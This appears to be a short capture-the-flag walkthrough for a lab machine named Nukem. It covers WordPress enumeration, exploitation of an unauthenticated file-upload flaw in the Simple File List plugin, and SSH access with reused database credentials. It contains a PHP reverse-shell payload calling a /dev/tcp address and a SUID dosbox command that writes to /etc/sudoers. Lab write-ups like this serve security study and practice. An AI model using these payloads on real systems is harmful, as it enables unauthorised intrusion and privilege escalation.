Nukem

Enumeration

80/tcp    open  http        Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-generator: WordPress 5.5.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
|_http-title: Retro Gamming – Just another WordPress site
wpscan --url http://192.168.210.105/ --api-token [REDACTED]
...
[i] Plugin(s) Identified:

[+] simple-file-list
...
 | Version: 4.2.2 (100% confidence)
 | [!] Title: Simple File List < 4.2.3 - Unauthenticated Arbitrary File Upload RCE
...
...
$ searchsploit WordPress Simple File List
WordPress Plugin Simple File List 4.2.2 - Arbitra | php/webapps/48979.py
$ cp /usr/share/exploitdb/exploits/php/webapps/48979.py .

Initial Access

We need to edit 36th line of 48979.py as follows(be careful with indentation)

payload = '<?php passthru("bash -i >& /dev/tcp/192.168.49.210/80 0>&1"); ?>'
/** MySQL database username */
define( 'DB_USER', 'commander' );

/** MySQL database password */
define( 'DB_PASSWORD', '[REDACTED]' );
$ ssh commander@192.168.210.105
commander: [REDACTED]

PrivEsc

dosbox has SUID bit.

$ dosbox -c 'mount c /etc' -c 'echo commander ALL=(ALL) ALL >> C:\sudoers' -c exit

Last updated